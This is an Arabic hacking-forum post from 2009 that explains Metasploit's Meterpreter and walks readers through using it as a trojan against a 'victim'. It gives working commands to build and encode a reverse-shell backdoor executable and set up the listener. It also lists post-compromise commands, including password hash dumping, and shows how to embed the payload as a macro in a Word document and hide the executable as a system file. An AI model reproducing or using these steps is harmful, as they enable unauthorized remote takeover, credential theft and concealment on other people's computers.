التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-24-2009, 02:02 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية LAV4
 

 

 
إحصائية العضو







LAV4 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
LAV4 is on a distinguished road

افتراضي MeTerPreTer ؟ ماهو ؟ استعملاتــه ؟ كيفية اخفائـه وتشغيله ( windows | Linux )


.. بسم اللـــه الرحمن الرحيم ..

السلآإم عليكم ..

مسسسآء / صبآـح الخير على الكل ..

اخبآركم ان شاء الله بخير وعآفيــه ..

اليوم موضوعنا بنتكلــم عن الـ MeTerPreTer .. !



Meterpreter هو اختصــآر لM E T A-interpreter ..

ولو بحثــت عن معنــأها لا وحدت انها تعني .. ( المفسر ) او ( المترجم )

الميتربريتر في الاصل هو ( Payload ) او شيل كود .. مبرمــج بلــغـة ( Assembly ) او لغــة التجميــع ..

وهي من افضل الادوآت اللي نستعملهــا في وظيــفة الاستغلال .. ومبنيــة في الاساس على تقنيـة ( Library Injection )

اول اصدار كامل لــها كان في مشروع M E T Asploit 3.2 .. وحدثـت وتم تضميــنها في MSF3 ..

الميتبربريتر ووفرت لتوفير مميزات متقـدمــه للمطورين لكتــآبــة الاستغلالات في الفروم الخاص بـ Shared Object .. (DLL) ..

وطبعا الميتربريتر تنزل كملفــآت تحكم كامل بالذآكرهـ دون المسآس بالقرص .. يعني تنفذ اوآمرها تحت وجود برآمج الحمآيـة ..

طيب بنستعملها اليوم في استغلالـها كملفــات تنفيذيـة ( executable Files ) .. او بالاصــح كـ(BackDoor ) ..

يعني نسوي بايلود او شيل كود على صيـغة ملف تنفيذي ختى نستخدمـــه كتروجــآن ..

لتســمح لنا بالتحكم الكامل بالجهاز المستهدف .. عن طريــق حقن ملفــات ( DLL ) ..

ويكون الاتصــال امــا Bind Shell ( اتصال مبآشر ) او Reverse Shell ( اتصال عكسي )

وطبعا افضــل الاتصال عكسي عن المبآشر .. لكن يحتآج بورت مفتوح لديــك .. اما المبآشر لابد من توفر البورت المفتوح لدى الجهاز المستهدف + الثغرهـ ..

والاتصــال العكسي الكل بيستعملــه مثل الـ ( RAT`s ) زي البوزيون والبيفروست والسباي نت وغيرهــا ..

طيب نرجــع لمحور حديــثنا اللي هو الميتربريتر .. !!

بعد ماتعرفـنا عليــه .. الان نجي لكيــفيـة انتآجــه .. !

وبالتأكيد بوآســـطة الميتاسبلويت .. وباتسخدآم msfpayload ..

هذا الامر ..
كود PHP:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 X > BackDoor.exe




ولو حبيت تشفرهـ بوآســطة الانكودر .. نستعمل هذا الامر .. !
كود PHP:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R | ./msfencode -b ' ' -t exe -o Backdoor.exe


وفي موضوع كامل ومفصل للاخ سيلفرروت عن الانكودرز ..


========

طيب نجي لشرح الامر بالتفصيل .. !

./ = امر تنفيذ او بدء باللينكس ..

msfpayload = الوظيــفة المستعملـة

windows/meterpreter/reverse_tcp = البايلود المستخدم

LHOST=192.168.1.1 = الـ Listening Host .. وهنا تحط الاي بي حقك ..

LPORT=4444 = الـ Listening Port .. وهنا تحط البورت لديك ..

X = تعني executable file اي ملف تنفيذي

-o = الاوتبوت او النآتج

BackDoor.exe = اسم الباكدوور


[ ~ صـــــــــــــــوره توضيـــــــــــــحيـــــــة ~ ]





وبالنسسسبة للي عندهم ويندوز ..

من هنا

HERE

يدخل ويحط الاي بي + البورت ..

ويضغط Generate Payload

وينسخ الشيل الكود الثاني الليـ هو $ My Shell Code ..

وبعدها يحفظــه بصيــغة C .. ويسويله كومبايل ..

ويصير كملف تنفيذي ..

وتتنصت عن طريق النت كات او الميتاسبلويت ..

واللي يبي يوصل لشي لازم يبحــــــــــــث ..

=========================

وبعد انتآج الملف التنفيذي ولك الحريــة كيف توصـله للجهاز المستهدف عاد انت وخبرتــك .. ! والجزء الثـــاني بعطيك طريقيتيــن .. ! ان شاء الله تستفيديون منها ..

بعد مايتم تشغيل الباكدوور لازم يكون في يتصل بالكلاينت مرهـ اخرى .. ! وحتى تتحكم بجهاز الضحيـة وش تسوي .. !

هنا يجي دور Multi/handler ..

نروح على الميتاسبوليت .. !

وعندك طريقتيـن يا تنفذ هالامر ..
كود PHP:
./msfcli PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 E


او تنفذها يدويـا .. باتبآع هذي الخطوآت ..


  • use multi/handler
  • set PAYLOAD windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.1
  • set LPORT 4444
  • exploit


[ ~ صــــــــــــــــوره توضيـــــــــــــــحيــــــــــــــــة ~ ]




وبعدها راح يتم الانتظآر لحد مايتم تشغيل الباكدوور وبعدها تقدر تبدأ بالتحكم الكآمل بوآســطة

sessions -l

sessions -i 1

واللي شآف شرحي المآضي يمكن عرف طريــقة الدخول للتحكم بالضحيــة
..



بعد الاختــــــراق هذي بعض الاوآمر المسسسسآعدهـ
..


استخراج الدوس

execute -c -f cmd -H

وبعدين

interact 1

============

رفع ملف الى جهاز الضحيــة

upload [ PATH ] > C:/[PATH]

طبعا PATH المسار اللي انت تحددهـ ..

==================

لمعرفــة مسارك

pwd


====================

tasklist

البروسس

======================

kill [ process ID ]

وتبدل

process ID

برقم البروسس الشغال ..

===========================

استخارج الهاشات

hashdump


وللمزيــــــد من الاوامر ..

help


____

[ الطريـقة الاولى ]

راح نقوم باخــفاء الباكدور داخل ملف doc .. اول ملف وورد بالاصح .. بطريــقة حلوهـ .. !

عند تكوين الباكدور بالامر راح نقوم بنفس الطريــقة لكن بتغيير طفيف ..

تآبـ‘ع ..

./ كود PHP:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 V > BackDoor.bas




لو تلآحــظ التغيير كان في شيئيـن .. !

تغيير exe الى bas .. وايضــآ X الى V ..


V = لانه ملف غير تنفيذي ..

bas هو BASIC Source Code .. يستعمل في برنــآمج Microsoft Visual Basic ..

واعتقد الاغلب عنده هالبرنآمج بحكم انه يكون مع Microsoft office ..

طيب الفكرهـ اننا ندمـج هالملف بملف الوورد مع الحفاظ على امتداد doc ..

طيب تآبــعوا الصور ..

نفتح ملف وورد ونكتب اللي تبيــه ..

وتآبــع ..



ومن ثم ..



وبعد ذلك ..



ولا تقوم بحفــظــه وانتهيــنا وبجرد مايفتح الشخص المستهدف .. بيوصلك الرد في الـ Multi/handler ..

طيب

[ الطريــقـه الثــآنيــة ]

وهو اخفـــــاء الباكدوور او اي ملف وومكت تنفذها بباتش اي برنامج اختراق .. !

طبعا الطريــقة حلوهـ .. !

راح نخفي الملـــف وحتى لو الضحيــة قام باظهار الملــفآت المخفيــة برضوو مارآح يطلع له شي .. !

لاننا رآح نخفيــه كملف نظآم او oprating system File .. !

طيب الامر راح نطبــقه بوآسـطة الدوس من الويندوز .. !

هذا هو الامر ..
كود PHP:
attrib +r +a +s +h Backdoor.exe


طبعا لازم تكون في مسار الملف عند اخفــآئــه ..

طيب نجي نشرح الامر
..

attrib = امر لتعديل خصائص الملف

+r = تعني Read Only .. اي للقرآئـة فقط

+a = وتعني Archive

+h = تعني Hidden او مخفي

+s = اي System File .. او ملف نظام .. !


وكـــذا راح يتم اخــفاء الملف كملف نظام
.. ! وحتى لو سويت اظهار للملفات المخفيـة ماراح يطلع الا بطريــقة واحد وهي انك تسوي اظهار لملفات النظام

ومحد اظن مفعلهـــأ
.. !

طبــعا خلاص اظن وصلت الفكرهـ وعند مية طريـقة وطريــقة تستعمل فيها هذي الحركــه
.. !

==============

والى هنا ينتهي موضوعنا اليوم .. !

اتمنى انه نآل اعجآبكم
.. !

واتمنى محد يستعملها في غير مايرضي الله .. كل واحد وضميرهـ
..!


بالتوفيــق للكـــل
..


للامانه الموضوع منقول





MeTerPreTer ? lhi, hsjulghjJJi ;dtdm hothzJi ,jaydgi ( windows | Linux

التوقيع



lava my name

hacker my game

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
كيفية عمل آتصال Vpn في Windows 7 .. ؟؟ ... !! ღ}~ ملكة الهاكر ريماس ~{ღ جـــ'ابات العناكــ'ب 6 12-17-2010 09:33 PM
the protection Under The Windows & Linux,,, Cd1 zager قســم إختــراق الأجهــزة 2 08-06-2010 11:31 PM


الساعة الآن 09:28 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0